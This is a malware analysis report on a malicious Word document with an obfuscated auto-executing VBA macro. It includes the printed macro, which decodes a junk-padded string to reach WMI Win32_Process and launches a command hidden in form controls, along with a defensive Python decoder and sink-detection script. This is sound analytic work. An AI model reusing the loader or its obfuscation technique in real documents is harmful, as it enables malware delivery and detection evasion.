Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e1eba613178eab55…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 153.0 KB
Created: 2019-09-23 06:17:00
Authoring application: Microsoft Office Word
First seen: 2020-04-06
MD5: 56d47781e43cc53702a12bd6634af3d5
SHA-1: 194085d25c89280dbabc1e41299e4b5fc193b6e3
SHA-256: e1eba613178eab5529545ca50542c1bed25d0759eb518c53e45eb8c1e09c4e69
Risk score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File

The sample is a malicious Word document (binary OLE format) carrying obfuscated VBA macros. The OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics indicate an auto-executing macro that rebuilds its strings at runtime and hands them to a COM-instantiation sink. The extracted module mow_7p4 bears this out: most of it is dead arithmetic on undeclared variables (Hex, Oct, Sin and Tan inside loops guarded by On Error Resume Next) that pads the code for signature evasion, and the one live statement passes a junk-padded literal through the decoder XsNNa_s and calls .Create on the resulting object. Assuming XsNNa_s is the junk-token Replace decoder the heuristic describes (its body is past the preview cut-off), stripping the repeated token yiwa from that literal leaves winmgmts:Win32_Process, so the macro spawns its payload through WMI (Win32_Process.Create) rather than through a visible Shell call. The command line itself is not in the module source: it is assembled from two of the twenty TextBox controls declared on ThisDocument (NfTYr68p and EAmMKG9) and run through the same decoder, so the form data stream, not the VBA source, holds the payload command. The OLE_LEGACY_WORDBASIC_AUTOEXEC finding is redundant here, since its description assumes no VBA project was recovered while olevba did recover one; the AutoOpen evidence is already covered by OLE_VBA_AUTOOPEN. The ClamAV detection Doc.Downloader.Sagent-7178142-0 is consistent with a downloader stage.

Heuristics 8

  • ClamAV: Doc.Downloader.Sagent-7178142-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sagent-7178142-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace URI, expected in any Office file that embeds drawing objects, and is not an indicator on its own.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 29357 bytes
SHA-256: 098609d902136d4c544612c3f299c48a5d07630da5f8859d62066c872eb86954
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "iP_UasF2, 0, 0, MSForms, TextBox"
Attribute VB_Control = "KzP19Z, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Fic3Oic, 2, 2, MSForms, TextBox"
Attribute VB_Control = "sAKWAi3, 3, 3, MSForms, TextBox"
Attribute VB_Control = "dpiNz7Li, 4, 4, MSForms, TextBox"
Attribute VB_Control = "iXT9cI, 5, 5, MSForms, TextBox"
Attribute VB_Control = "wHbUXGq, 6, 6, MSForms, TextBox"
Attribute VB_Control = "EAmMKG9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "s9dsN64, 8, 8, MSForms, TextBox"
Attribute VB_Control = "XEtisF4, 9, 9, MSForms, TextBox"
Attribute VB_Control = "mNisohpn, 10, 10, MSForms, TextBox"
Attribute VB_Control = "VwmUsJ, 11, 11, MSForms, TextBox"
Attribute VB_Control = "OV5XEB, 12, 12, MSForms, TextBox"
Attribute VB_Control = "RG2GZfYp, 13, 13, MSForms, TextBox"
Attribute VB_Control = "NfTYr68p, 14, 14, MSForms, TextBox"
Attribute VB_Control = "pLFXtJs, 15, 15, MSForms, TextBox"
Attribute VB_Control = "G31fts1, 16, 16, MSForms, TextBox"
Attribute VB_Control = "NtI9sr9, 17, 17, MSForms, TextBox"
Attribute VB_Control = "OcXikq8w, 18, 18, MSForms, TextBox"
Attribute VB_Control = "IJiF_T, 19, 19, MSForms, TextBox"

Attribute VB_Name = "mow_7p4"
Function A38vzGq()
   On Error Resume Next
   Do
      If ObQzzwn2 = q8IS5v Then
         JjUp9Fp = RRI4wnn _
         - Hex(51 + Oct(960 / Round(372))) _
         + 287 - Fix(uQEYVf) - 81 - vcBomQ _
         - uPYmiKIw * Sin(dhMCUf)
         sTbwLzco = Tan(544)
      End If
         w5tBs6 = MprtIRJ _
         * Round(jI4Hjm4Z) / EEjK1A6 / cizSJ8 + (CHLJoH4 _
         / Sin(OFcR2ml) / 921 * Sin(Qqi2tOc1))
      For Each s2tLQO1 In Ub8qYVtz
         k8O7Wn = KZ8sznf5 * Round(vMDBVp0) _
         / AGfAaFz / j6XiqVn + (jnUKfqK5 / Sin(jmk9_Qkw) _
         / 470 * Sin(bmB1ERv))

      Next
Loop Until bsYcpRu = f11j7zG1
j_iIutj = XJEwbR + XsNNa_s(ThisDocument.NfTYr68p + ThisDocument.EAmMKG9) + isF6qlw
   On Error Resume Next
   Do
      If Su3AIKi = qKtdHp Then
         ztDYt7iF = AHzaFwwz _
         - Hex(402 + Oct(799 / Round(831))) _
         + 174 - Fix(TwriHZ_j) - 198 - zZTiFLYA _
         - Q6oddDSZ * Sin(iV1KbMBj)
         zBqqtl = Tan(431)
      End If
         Q5XwJB = GNAEGkc _
         * Round(hjIG5J) / Q3SO0v3O / Ik3Mzm + (qjMNWk _
         / Sin(DCrKauj) / 91 * Sin(IQOJdJ2F))
      For Each tTbvjJ In NiGfsAd
         c2paAwXp = vVZWI2SW * Round(OKBlZTj) _
         / cOrwTSO / tfEFKZ6A + (woZpQC / Sin(rDBrSo_) _
         / 347 * Sin(LhGD5_b))

      Next
Loop Until dMAmqYdU = Hkbwv7

CreateObject(XsNNa_s("yiwawiyiwayiwayiwanmgmyiwatsyiwayiwa:yiwayiwaWiyiwayiwanyiwa3yiwa2yiwa_yiwaProyiwaceyiwassyiwayiwa")).Create j_iIutj, z0a9o4, ArdSEzl, sGjXiKtT
   On Error Resume Next
   Do
      If U_kcW2CV = bZsizMmf Then
         Y8jTzZWS = zsENVMG6 _
         - Hex(781 + Oct(402 / Round(229))) _
         + 544 - Fix(r8J2pAi) - 47 - RjKi_Ob _
         - i8fvwP * Sin(RfIlGrr8)
         ptpz752 = Tan(263)
      End If
         qOE_6w1 = DEL5I2p_ _
         * Round(Mzdh7ros) / Bl5jw5lQ / rRb15_ + (izH8kAAp _
         / Sin(HTQDNW1d) / 125 * Sin(GOQZiFA))
      For Each jo7UvHw In B5jHh5
         wwDF_a = nWjtdiAC * Round(CO_f7akv) _
         / HBsWRR / vSoNFm + (MDmi5d1w / Sin(Ld2njO_i) _
         / 46 * Sin(hMbLWwI0))

      Next
Loop Until HXfKLjI5 = J5hYDpYR

   On Error Resume Next
   Do
      If nipBXKj = QGYX5iO Then
         U6_qAa = LKhpvTa _
         - Hex(34 + Oct(651 / Round(235))) _
         + 922 - Fix(sqJJis_) - 216 - j7wimiw _
         - UiEiPo * Sin(RL_iz0JY)
         W06MAni = Tan(593)
      End If
         lujD3jI = WXbfPhXz _
         * Round(u9nF66WQ) / Zc_fLM / GHCp8Z9U + (lXzMjj2f _
         / Sin(iIfP31Q) / 641 * Sin(wTDUmr8))
      For Each ANHkzb In TS5iprGj
   
... (truncated)
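As an added worked example (not part of this report, of oletools, or of the sample), the following Python reproduces over a constructed excerpt of the macro above the two steps the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic describes: it infers the junk token in a long string literal by brute force, strips it, and then re-scans the decoded source for auto-exec entry points and execution sinks so that the sinks hidden from the visible source become countable. The decoder XsNNa_s itself is past the preview cut-off, so treating it as plain Replace-removal of one repeated token is an assumption; the Sub AutoOpen stub in the excerpt is constructed to stand in for the AutoOpen that OLE_VBA_AUTOOPEN reports, and the entry-point and sink lists are the editor's own, not the sandbox's.

```python
"""Junk-token VBA string decoding and auto-exec/sink triage (added example)."""
import json
import re
from collections import Counter

# Constructed excerpt: the live lines of module mow_7p4 from the preview above plus
# an assumed AutoOpen entry stub. The real decoder XsNNa_s is outside the preview.
MACRO_EXCERPT = r'''
Attribute VB_Name = "mow_7p4"
Function A38vzGq()
   On Error Resume Next
j_iIutj = XJEwbR + XsNNa_s(ThisDocument.NfTYr68p + ThisDocument.EAmMKG9) + isF6qlw
CreateObject(XsNNa_s("yiwawiyiwayiwayiwanmgmyiwatsyiwayiwa:yiwayiwaWiyiwayiwanyiwa3yiwa2yiwa_yiwaProyiwaceyiwassyiwayiwa")).Create j_iIutj, z0a9o4, ArdSEzl, sGjXiKtT
End Function
Sub AutoOpen()
   A38vzGq
End Sub
'''

# Only long literals are worth decoding; short ones (names, attributes) are skipped.
STRING_LITERAL = re.compile(r'"([^"\r\n]{24,})"')
# Entry points Office runs on open/close without further user interaction (editor's list).
AUTOEXEC = re.compile(r'\b(Auto_?Open|AutoExec|AutoClose|Document_Open|Workbook_Open)\b', re.I)
# Execution / object-instantiation sinks the loader heuristic keys on (editor's list).
SINKS = re.compile(
    r'\b(CreateObject|Shell|WScript\.Shell|winmgmts|Win32_Process|URLDownloadToFile|XMLHTTP|ADODB\.Stream)\b',
    re.I,
)


def guess_junk_token(s, min_len=3, max_len=6, min_count=3):
    """Return the repeated substring whose removal shortens s the most.

    Assumes Replace-style junk padding: the token recurs at least min_count
    times and carries no payload characters. Returns None if nothing recurs.
    """
    best = None
    for n in range(min_len, max_len + 1):
        counts = Counter(s[i:i + n] for i in range(len(s) - n + 1))
        for tok, c in counts.items():
            if c < min_count:
                continue
            # Smallest residue wins; tie-break on shorter token, then lexicographic.
            key = (len(s.replace(tok, "")), len(tok), tok)
            if best is None or key < best:
                best = key
    return best[2] if best else None


def decode_literal(s):
    """Strip the inferred junk token; return s unchanged if no token is found."""
    tok = guess_junk_token(s)
    return s.replace(tok, "") if tok else s


def triage(source):
    """Decode padded literals, then compare sinks visible before and after decoding."""
    decoded = {}
    for m in STRING_LITERAL.finditer(source):
        lit = m.group(1)
        plain = decode_literal(lit)
        if plain != lit:
            decoded[lit] = plain
    expanded = source
    for lit, plain in decoded.items():
        expanded = expanded.replace(lit, plain)
    return {
        "autoexec": sorted({m.group(1) for m in AUTOEXEC.finditer(expanded)}),
        "sinks_visible": sorted({m.group(1) for m in SINKS.finditer(source)}),
        "sinks_after_decode": sorted({m.group(1) for m in SINKS.finditer(expanded)}),
        # Form-control values fed to the decoder: the command line lives there, not in the source.
        "form_controls": sorted(set(re.findall(r'ThisDocument\.(\w+)', source))),
        "decoded_strings": decoded,
    }


if __name__ == "__main__":
    print(json.dumps(triage(MACRO_EXCERPT), indent=2))
```

On the excerpt the visible source exposes only CreateObject, while the decoded source adds winmgmts and Win32_Process, which is exactly the gap the loader heuristic is built to close. The token guess is a brute-force residue search rather than a frequency count because the most frequent n-gram of a padded string is often an offset fragment of the token (iway, ayiw) rather than the token itself; minimising what is left after replacement sidesteps that. The form_controls entry is the pointer for the next step: the TextBox values have to be pulled from the form data stream before the same decoder can recover the command line.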